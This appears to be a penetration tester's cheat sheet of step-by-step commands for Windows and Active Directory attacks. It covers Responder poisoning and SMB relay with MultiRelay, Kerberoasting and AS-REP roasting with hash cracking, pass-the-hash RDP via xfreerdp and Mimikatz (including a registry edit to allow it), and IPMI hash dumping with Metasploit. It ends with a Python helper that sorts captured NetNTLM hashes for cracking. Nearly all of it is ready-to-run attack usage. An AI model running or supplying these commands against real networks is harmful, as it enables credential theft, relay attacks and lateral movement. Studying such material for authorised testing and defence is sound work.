## RESPONDER

REFERENCES:
- @PythonResponder https://github.com/lgandx/Responder.git
- @Evil_Mog https://github.com/evilmog/ntlmv1-multi
- @NotMedic https://github.com/NotMedic/NetNTLMtoSilverTicket
- (Free online NetNTLMv1 cracking) https://crack.sh/netntlm/

Responder is an LLMNR, NBT-NS and MDNS poisoner and will answer specific NBT-NS queries on the network based on their name suffix.

Responder listens on ports: UDP 53,137,138,389,1434; TCP 21,25,80,110,139,389,445,587,1433,3128,3141; and Multicast UDP 5553.

```bash
python Responder.py -I <interface>
```

EXAMPLE HASHES

```text
(NTLMv1 SSP Enabled Hash Example)
hashcat::admin-SAA37877:85D5BC2CE95161CD00000000000000000000000000000000:892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0:1122334455667788

(NTLMv1 No-SSP Hash Example)
hashcat::admin-SAA37877:76365E2D14285612980C67D057EB9EFEEE5EF6EB6FF6E04D:727B4E35F947129EA5289CDEDAE869348823EF89F50FC595:1122334455667788

(NTLMv2 Hash Example)
admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030
```

Responder.conf - location for modifying various Responder configuration settings.

To target a specific IP address on the network and limit possible network disruptions, edit the Responder.conf value "RespondTo" and add the range 10.X.X.1-10 or the host 10.X.X.2.

To target a particular NBT-NS/LLMNR name, edit the Responder.conf value "RespondToName" to a targeted spoof hostname, e.g. SQLSERVER-01, FILESHARE02, ...

Use analyze mode '-A' when trying to gauge how noisy the target IP space may be; it watches requests without responding to them:

```bash
python Responder.py -I <interface> -A
```

### MULTI-RELAY w/ RESPONDER

STEP 1: Disable the HTTP & SMB servers by editing the Responder.conf file.

STEP 2: Run RunFinger.py to check whether the host has SMB Signing: False. RunFinger.py is located in the tools directory; this script allows you to verify if SMB Signing: False.
SMB Signing being disabled is crucial for this relay attack; otherwise the relay target isn't vulnerable to it.

```bash
python RunFinger.py -i 10.X.X.0/24
```

STEP 3: Start Responder.py

```bash
python Responder.py -I <interface>
```

STEP 4: Start the MultiRelay tool to route captured hashes to our Target IP. Caveat: the "-u" user must be a local administrator on the target host.

```bash
python MultiRelay.py -t <Target IP> -u ALL
```

**MacOS / OSX**: Responder must be started with an IP address for the -i flag (e.g. -i YOUR_IP_ADDR). There is no native support in OSX for custom interface binding, so using -i en1 will not work. Be sure to run the following commands as root to unload these possibly running services and limit conflicts:

```bash
launchctl unload /System/Library/LaunchDaemons/com.apple.Kerberos.kdc.plist
launchctl unload /System/Library/LaunchDaemons/com.apple.mDNSResponder.plist
launchctl unload /System/Library/LaunchDaemons/com.apple.smbd.plist
launchctl unload /System/Library/LaunchDaemons/com.apple.netbiosd.plist
```

## KERBEROASTING

SCENARIO: You've gained a foothold on the target network. You can now attempt to enumerate/harvest Kerberos tickets to extract and crack user-created accounts visible on the network.

REFERENCES:
- https://room362.com/post/2016/kerberoast-pt1/
- https://github.com/skelsec/kerberoast
- https://github.com/magnumripper/JohnTheRipper/blob/bleedingjumbo/run/kirbi2john.py

STEP 1: Enumerate SPNs (Service Principal Names, which are used by Kerberos to authenticate to a service instance with a logon account) or AS-REP-roastable accounts on the network. FYI you can use option "-n" to pass an NT hash instead of a password.

```bash
pip3 install kerberoast
kerberoast.py ldap spn <domain>/<username>:<password>@<DC_IPaddr> -o spn_enum.txt
```

OR ASREP

```bash
kerberoast.py ldap asrep <domain>/<username>:<password>@<DC_IPaddr> -o asrep_enum.txt
```

OR Manual Method

```powershell
C:\> setspn -T <domain> -Q */*
```

STEP 2: Request SPN Kerberos tickets for the accounts we want to target.
FYI we can use a password, an NT hash ("-n") or an AES key ("-a") with kerberoast.py.

```bash
kerberoast.py spnroast <kerberos_realm>/<username>:<password|NT_hash|AES_key>@<DC_IPaddr> -o kirbi_tix.txt
```

OR Manual Method (the constructor argument is the SPN of the service to request a ticket for)

```powershell
PS C:\> Add-Type -AssemblyName System.IdentityModel
PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "<SPN>"
```

STEP 3: Crack the target SPN tickets using John or Hashcat. Depending on the collection method you may need to convert them using kirbi2john.py.

```bash
john --format=krb5tgs kirbi_tix.txt --wordlist=dict.txt
hashcat -a 0 -m 13100 -w 4 kirbi_tix.txt dict.txt
hashcat -a 0 -m 18200 -w 4 kirbi5_asrep_etype23_tix.txt dict.txt
```

If you need to manually convert kirbi2john output to hashcat format try:

```bash
cat kirbi2john_format.txt | sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/'
```

## Windows RemoteDesktop XFREERDP Pass-The-Hash

STEP 1: Install the XFreeRDP client

```bash
apt-get install freerdp-x11
```

STEP 2: Use the 'pth' option to Pass-The-Hash for an RDP session on a target:

```bash
xfreerdp /u:<username> /d:<domain> /pth:<NTLM Hash> /v:<IP Address>
```

## MIMIKATZ Pass-The-Hash RDP

STEP 1: Obtain local Admin on a machine.

STEP 2: Load Mimikatz and launch the following command:

```powershell
sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<NTLM Hash> /run:"mstsc.exe /restrictedadmin"
```

STEP 3: In the RDP window enter the domain/IP address of the target machine. Done.

**If the Restricted Admin Mode setting blocks the above, you can change it through the following:**
STEP 1: Execute PowerShell on the remote target machine:

```powershell
mimikatz.exe "sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<NTLM Hash> /run:powershell.exe"
```

STEP 2: In the new PowerShell window enter the following to set the DisableRestrictedAdmin registry value to 0:

```powershell
Enter-PSSession -ComputerName <Hostname>
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force
```

STEP 3: Now retry the Mimikatz RDP pass-the-hash attack above.

## IPMI

SCENARIO: You have found an open IPMI port 623 running version 2.0. This version is vulnerable to dumping the stored user password hashes.

STEP 1: Port 623 UDP needs to be open on the device.

STEP 2: Load the Metasploit module and configure its options to dump the IPMI hashes:

```bash
use auxiliary/scanner/ipmi/ipmi_dumphashes
set verbose true
set RHOSTS <Target_IPAddr>
run
```

STEP 3: Collect the hashes into a hash.txt file and attempt to crack them with Hashcat mode 7300:

```bash
hashcat -a 0 -m 7300 hash.txt dict.txt
```

[[Home]] #tools #howto
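Back to the Responder example hashes and the kirbi2john conversion above: an added Python triage helper (example code, not from this page's author, Responder or kerberoast) that tells which NetNTLM variant a captured hashcat-format line is from its field lengths, which cracking mode/format it maps to, and whether it carries Responder's stock 1122334455667788 challenge; it also mirrors the page's sed one-liner for kirbi2john output. The sample lines are copied from the page's example hashes and the `$krb5tgs$svc_sql:...` line is constructed.

```python
import re
from typing import Dict, Optional

# Constructed sample lines, copied from this page's example hashes (not real captures).
NTLMV1_SSP = ("hashcat::admin-SAA37877:85D5BC2CE95161CD00000000000000000000000000000000:"
              "892F905962F76D323837F613F88DE27C2BBD6C9ABCD021D0:1122334455667788")
NTLMV2 = ("admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:"
          "5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d"
          "013c31cdb3b92f5d765c783030")

RESPONDER_DEFAULT_CHALLENGE = "1122334455667788"  # the stock Challenge value in Responder.conf
HEX = re.compile(r"^[0-9A-Fa-f]+$")
KIRBI2JOHN = re.compile(r"^\$krb5tgs\$(.*):(.*)$")


def classify_netntlm(line: str) -> Dict[str, object]:
    """Tell which NetNTLM variant a 'user::domain:f3:f4:f5' line is from its field lengths."""
    parts = line.strip().split(":")
    if len(parts) != 6 or not all(HEX.match(p) for p in parts[3:]):
        raise ValueError("not a hashcat-format NetNTLM line")
    user, _, domain, f3, f4, f5 = parts
    lengths = (len(f3), len(f4), len(f5))
    if lengths == (48, 48, 16):
        # NetNTLMv1: 24-byte LM response, 24-byte NT response, 8-byte server challenge.
        # With SSP/ESS the LM field is an 8-byte client nonce followed by 16 zero bytes.
        ssp = f3[16:] == "0" * 32
        variant, mode, john, chal = ("NetNTLMv1-SSP" if ssp else "NetNTLMv1"), 5500, "netntlm", f5
    elif lengths[:2] == (16, 32) and lengths[2] > 32 and lengths[2] % 2 == 0:
        # NetNTLMv2: 8-byte server challenge, 16-byte NTProofStr, variable-length blob.
        variant, mode, john, chal = "NetNTLMv2", 5600, "netntlmv2", f3
    else:
        raise ValueError(f"unrecognised field lengths {lengths}")
    return {"variant": variant, "user": user, "domain": domain, "hashcat_mode": mode,
            "john_format": john,
            # the stock Responder challenge in a capture points at a poisoner left on defaults
            "default_responder_challenge": chal.lower() == RESPONDER_DEFAULT_CHALLENGE}


def kirbi2john_to_hashcat(line: str) -> Optional[str]:
    """Rewrite a kirbi2john '$krb5tgs$<name>:<data>' line to hashcat 13100 '$krb5tgs$23$*<name>*$<data>',
    the same transformation as the page's sed one-liner; returns None for non-matching lines."""
    m = KIRBI2JOHN.match(line.strip())
    return f"$krb5tgs$23$*{m.group(1)}*${m.group(2)}" if m else None


if __name__ == "__main__":
    for sample in (NTLMV1_SSP, NTLMV2):
        print(classify_netntlm(sample))
    print(kirbi2john_to_hashcat("$krb5tgs$svc_sql:abc123$def456"))
```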